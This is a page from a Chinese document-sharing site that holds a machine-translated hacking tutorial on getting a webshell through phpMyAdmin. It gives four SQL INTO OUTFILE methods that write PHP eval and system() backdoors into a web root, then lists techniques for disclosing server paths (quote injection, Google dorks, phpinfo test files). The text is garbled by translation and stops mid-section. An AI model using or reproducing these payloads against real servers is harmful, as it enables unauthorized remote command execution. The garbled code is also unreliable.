- 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
phpmyadmin各种方法拿webshell(PhpMyAdmin various ways to get webshell)
phpmyadmin各种方法拿webshell(PhpMyAdmin various ways to get webshell)
Twenty-ninth lesson phpMyAdmin various skills, take webshell
Author: Darkmoon blog:
B/phpMyAdmin
B/sql
D:\wamp\www
Account number and password
Root password
First kind
CREATE, TABLE, `mysql`.`darkmoon` (`darkmoon1`, TEXT, NOT, NULL);
INSERT INTO `mysql`.`darkmoon` (`darkmoon1`) VALUES (? PHP @eval ($_POST[pass]);? );
SELECT, `darkmoon1`, FROM, `darkmoon`, INTO, OUTFILE,d:/wamp/www/darkmoon.php;
DROP, TABLE, IF, EXISTS, `darkmoon`;
Second methods
Create, TABLE, moon (Darkmoon, text, NOT, NULL);
Insert INTO moon (Darkmoon) VALUES (? PHP @eval ($_POST[pass]);? );
Select, Darkmoon, from, moon, into, outfile,d:/wamp/www/darkmoon2.php;
Drop, TABLE, IF, EXISTS, moon;
Third methods:
Select? PHP @eval ($_POST[pass]); INTO OUTFILEd:/wamp/www/darkmoon3.php?
Fourth methods
Select PHP echo? \pre\; system ($_GET[\cmd\]); echo \/pre\; INTO OUTFILEd:/wamp/www/darkmoon4.php?
/darkmoon4.php? Cmd=net user?
PHP all of the crit paths
1, single quote burst path
Explain:
Single quotes are added directly behind URL, requiring single quotation marks to not be filtered (gpc=off), and the server defaults to error messages.
W/news.php? Id=149 ?
2 、 error parameter explosion path
Explain:
Change the value of the parameter to be submitted to an error value, such as -1. When -99999 single quotes are filtered, you might as well try.
W/researcharchive.php? Id=-1?
3, Google explosion path
Explain:
Combine keyword and site syntax to search for page snapshots of error pages. Common keywords include warning and fatal error. Note that if the target site is a two domain name, the site meets its corresponding top-level domain name, which gives much more information.
Site:.tw warning
Site:.tw fatal error
4, test file burst path
Explain:
There are test files in the root directory of many websites, and script code is usually phpinfo ().
W/test.php
W/ceshi.php
W/info.php
W/phpinfo.php
W/php_info.php
W/1.php
5, phpMyAdmin explosion path
Explain
您可能关注的文档
- 2010年成人英语三级考试虚拟语气精讲(2010 adult English Test Band Three subjunctive).doc
- 2010年陕西省高考英语试题答案详细解析版(2010 Shaanxi college entrance examination English examination questions detailed analysis version).doc
- 2010年高考英语考点汇集(2010 college entrance examination center).doc
- 2010教师招聘考试心理学(中小学)试题(附答案)修改(2010 teacher recruitment examination Psychology (primary and secondary school) examination questions (attached to the answer) modify).doc
- 2010高考英语知识串讲5(2010 college entrance examination English knowledge Chuanjiang 5).doc
- 2011 有用的执医考试(2011 useful medical examination).doc
- 2011-2012学年度八年级生物上学期期中教学质量监测试题(无答案)人教新课标版(2011-2012 year of biology, grade eight biology semester teaching quality monitoring questions (no answer), people teach new curriculum version).doc
- 2011初中生转化技巧.ppt(2011 junior high school students conversion skills.Ppt).doc
- 2011前服务规范多选题1(The 2011 service specification multiple-choice questions 1).doc
- 2011届高考英语一轮复习单元专题配套精练必修5 unit 4(The 2011 session of the college entrance examination English unit review unit 5 unit 4).doc
- phtoshop快捷键(phtoshop快捷键).doc
- pets2口语(2口语).doc
- pid就是比例微积分调节,具体你可以参照自动控制课程里 …(PID is the proportional calculus adjustment, and you can refer to the automatic control course...).doc
- ppc raga(PPC的拉格).doc
- ppt---硕士论文答辩(Ppt--- master's thesis defense).doc
- photoshopcs2快捷键(快捷键PhotoshopCS2).doc
- printf()详解(Printf () detailed explanation).doc
- proe各种曲线方程集合(Proe sets of various curve equations).doc
- ps cs5快捷键(PS CS5快捷键).doc
- ppt 设计师的十大秘诀(Ten Secrets of PPT designers).doc
文档评论(0)